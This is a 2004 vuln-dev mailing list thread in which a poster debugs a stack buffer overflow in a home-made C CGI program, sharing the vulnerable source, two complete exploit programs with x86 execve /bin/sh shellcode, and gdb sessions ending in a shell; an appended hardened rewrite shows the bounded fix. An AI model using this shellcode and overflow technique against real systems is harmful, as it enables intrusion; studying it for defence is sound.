Vulnerability Development mailing list archives
Re: Problem exploiting a CGI overflow
From: sin <sin () innocence-lost net>
Date: Sun, 28 Nov 2004 20:56:44 -0700 (MST)
Firstly, my last post was delayed by several days. Glad you got it working; I didn't realize it was using scanf()/etc. I deleted the first email after I replied (bad habit of mine). As for the last 'funny thing', that's a debugger thing: it detects the execve and is quite normal. Actually I've never investigated what exactly it detects, but it's the result of the execve.

--
There are only two choices in life. You either conform the truth to your desire, or you conform your desire to the truth. Which choice are you making?

On Thu, 25 Nov 2004, [iso-8859-1] Víctor Henríquez wrote:
Date: Thu, 25 Nov 2004 14:44:34 +0000
From: "[iso-8859-1] Víctor Henríquez" <vhenriquez () grancanaria com>
To: vuln-dev () securityfocus com
Subject: Re: Problem exploiting a CGI overflow

I have a solution... First, the problem was in scanf() (as Rob Seace told me). scanf() filters all whitespace characters. Second, I wrote a shellcode without 0x0b, 0x0c, but it didn't work because I didn't close and re-open stdin (as Marco Ivaldi suggested). Here is the final exploit:

--- cut ---
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* for strlen(); missing from the posted source */

#define DEFAULT_ADDRESS     0xbffff4d4
#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 520
#define NOP                 0x90

char shellcode[] =
  "\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
  "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
  " \x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\x04\x06\x04\x05\xcd\x80 ";

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;
  FILE *out;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = DEFAULT_ADDRESS + offset;
  printf("Using address: 0x%x\n", addr);

  /* fill the whole buffer with the address, then NOPs in the first half,
     then place the shellcode in the middle */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  if ((out = fopen("buffer", "w")) == NULL) {
    perror("fopen");
    exit(-1);
  }
  fprintf(out, "%s", buff);
  fclose(out);
  return 1;
}
--- cut ---

$ cc exploit.c -o exp
$ ./exp
Using address: 0xbffff4d4
$ ./post.cgi < buffer
sh-2.05a$

Thanks for all the posts :)

A funny thing...
I suppose that is an alignment problem:

$ ./exp
Using address: 0xbffff4d4
$ cc post2.c -o post
$ ./post < buffer
Violación de segmento
$ cc post2.c -o post.cgi
$ ./post.cgi < buffer
sh-2.05a$ exit
exit

More funny:

$ cc post2.c -o post
$ ./post < buffer
Violación de segmento
$ gdb post
gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking
(gdb) r < buffer
Starting program: /home/victor/laboratory/gsi/post-dev/post < buffer

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c00 in object.11 () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05a$

--
Víctor Henríquez

Quoting Víctor Henríquez <vhenriquez () grancanaria com>:

Hi, I'm new in this world. I discovered several buffer overflow problems in some of our home-made apps. I try to exploit this but I have a rare problem.

--- Vuln Code (post2.c) ---
#include <stdio.h>
#include <string.h>

int main()
{
  void split(char *line);
  char line1[500],line2[500];

  strcpy(line2,"");
  while (!feof(stdin)) {
    scanf("%s",&line1);
    strcat(line1," ");
    strcat(line2,line1);
  }
  split(line2);
  printf("bye\n");
}

void split(char *line)
{
  char txt[500];
  char *p;

  strcpy(txt,line);
}
---

$ cc post2.c -o post.cgi -ggdb
$ perl -e 'print "A"x520' | ./post.cgi
Violación de segmento (core dumped)
$ gdb post.cgi core
gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking
Core was generated by `./post.cgi'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()

Well... I'm trying to overflow the strcpy() in split().
--- exploit code ---
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* for strlen(); missing from the posted source */

#define DEFAULT_ADDRESS     0xbffff4d4
#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 520
#define NOP                 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;
  FILE *out;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = DEFAULT_ADDRESS + offset;
  printf("Using address: 0x%x\n", addr);

  /* fill the whole buffer with the address, then NOPs in the first half,
     then place the shellcode in the middle */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  if ((out = fopen("buffer", "w")) == NULL) {
    perror("fopen");
    exit(-1);
  }
  fprintf(out, "%s", buff);
  fclose(out);
  return 1;
}
---

Now the problem...

$ echo "AAA" | ./post.cgi
bye
$ cc exploit.c -o exp
$ ./exp
Using address: 0xbffff4d4
$ cat buffer | ./post.cgi

Really it executes other code, but not the shellcode. More GDB now...

$ gdb post.cgi
(gdb) r < buffer
Starting program: /home/victor/laboratory/gsi/post-dev/post.cgi < buffer

Breakpoint 1, split (line=0xbffff6e0 '\220' <repeats 200 times>...) at post2.c:21
21        strcpy(txt,line);
(gdb) info f
Stack level 0, frame at 0xbffff6b8:
 eip = 0x804859d in split (post2.c:21); saved eip 0x804857f
 called by frame at 0xbffffac8
 source language c.
 Arglist at 0xbffff6b8, args: line=0xbffff6e0 '\220' <repeats 200 times>...
 Locals at 0xbffff6b8, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff6b8, eip at 0xbffff6bc
(gdb) x 0xbffff6bc
0xbffff6bc:     0x0804857f
(gdb) n
22      }
(gdb) x 0xbffff6bc
0xbffff6bc:     0xbffff4d4      // Ret Changed!!
(gdb) x/100 0xbffff4d4
0xbffff4d4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4e4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4f4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff504:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff514:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff524:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff534:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff544:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff554:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff564:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff574:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff584:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff594:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a4:     0x90909090      0x90909090      0x90909090      0x1feb9090
0xbffff5b4:     0x0876895e      0x4688c031      0x20468907      0xf38920b0
0xbffff5c4:     0x8d084e8d      0x80cd2056      0xd889db31      0xe880cd40
0xbffff5d4:     0xffffffdc      0x6e69622f      0xbf68732f      0xbffff4d4
0xbffff5e4:     0xbffff4d4      0xbffff4d4      0xbffff4d4      0xbffff4d4
0xbffff5f4:     0xbffff4d4      0xbffff4d4      0xbffff4d4      0xbffff4d4
// Shellcode is in position...
(gdb) n
Program exited normally.

What's happening!? I discovered that the shellcode changes during its execution. Yeah, some bytes of the shellcode change while it is running. Why?? How can I avoid this?

Thanks in advance

--
Víctor Henríquez

-------------------------------------------------
This email has been sent via http://www.grancanaria.com
-------------------------------------------------
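For the defender's side of this thread, here is a bounded rewrite of the vulnerable post2.c that was quoted above. It is an added example, not code from the thread or from the original poster: the three unbounded calls in post2.c (scanf("%s") into line1, strcat into line2, strcpy into txt) each get a length-checked replacement, and an over-long input becomes a visible error return instead of a write past the end of a stack buffer. The function names append_token, split_bounded and read_tokens_from_string, the LINE_MAX_LEN constant and the sample input in main() are my assumptions; the 520-byte input mirrors the perl one-liner that crashed the original program.

```c
/* Hardened rewrite of the vulnerable post2.c quoted in the thread.
 * Added for illustration; not code from the thread. Function names,
 * LINE_MAX_LEN and the constructed sample input in main() are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINE_MAX_LEN 500   /* same buffer size as the original line1/line2/txt */

/* Append tok plus one separating space to dst, which holds at most dstsize
 * bytes including the terminating NUL. Returns 0 on success, -1 if the
 * result would not fit; on failure dst is left unchanged.
 * Replaces the unbounded strcat(line2, line1) of the original. */
int append_token(char *dst, size_t dstsize, const char *tok)
{
    size_t have = strlen(dst);
    size_t toklen = strlen(tok);

    /* need toklen bytes for the token, 1 for the space, 1 for the NUL */
    if (dstsize - have < toklen + 2)
        return -1;
    memcpy(dst + have, tok, toklen);
    dst[have + toklen] = ' ';
    dst[have + toklen + 1] = '\0';
    return 0;
}

/* Bounded replacement for split(): the original strcpy(txt, line) copied the
 * caller's whole string into a 500-byte stack buffer. This version keeps at
 * most sizeof(txt) - 1 bytes and returns how many it kept, so the caller can
 * see that truncation happened. */
size_t split_bounded(const char *line)
{
    char txt[LINE_MAX_LEN];
    size_t n = strlen(line);

    if (n > sizeof txt - 1)
        n = sizeof txt - 1;
    memcpy(txt, line, n);
    txt[n] = '\0';
    return n;   /* txt would be parsed here; nothing else is done with it */
}

/* Tokenise data the way the original loop did (whitespace-separated %s
 * conversions), but with a field width so a single token can never overflow
 * line1, and with the bounded append above so line2 cannot overflow either.
 * Returns the number of tokens accepted, or -1 if the accumulated line would
 * have exceeded size bytes. */
int read_tokens_from_string(const char *data, char *line2, size_t size)
{
    char line1[LINE_MAX_LEN];
    int consumed = 0;
    int count = 0;

    line2[0] = '\0';
    /* %499s: at most LINE_MAX_LEN - 1 characters per token; %n records how
     * far sscanf got so the next call resumes after this token. */
    while (sscanf(data, "%499s%n", line1, &consumed) == 1) {
        data += consumed;
        if (append_token(line2, size, line1) != 0)
            return -1;
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed sample inputs: a short normal request, and the 520 'A's
     * from the thread's perl one-liner that crashed the original program. */
    char big[521];
    char line2[LINE_MAX_LEN];
    const char *samples[2];
    int i;

    memset(big, 'A', 520);
    big[520] = '\0';
    samples[0] = "AAA";
    samples[1] = big;

    for (i = 0; i < 2; i++) {
        int tokens = read_tokens_from_string(samples[i], line2, sizeof line2);
        if (tokens < 0) {
            fprintf(stderr, "input %d too long, refusing to process it\n", i);
            continue;
        }
        printf("input %d: %d token(s), split kept %zu bytes\n",
               i, tokens, split_bounded(line2));
    }
    printf("bye\n");
    return 0;
}
```

The point is that every place the original could be pushed past a buffer end now returns a value the caller can check: the same 520-byte input that produced 0x41414141 in the saved return address is rejected with -1 before anything is copied.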
Current thread:
- Problem exploiting a CGI overflow Víctor Henríquez (Nov 23)
- Re: Problem exploiting a CGI overflow sin (Nov 23)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 24)
- Re: Problem exploiting a CGI overflow Vlad902 (Nov 27)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 29)
- <Possible follow-ups>
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 28)
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 23)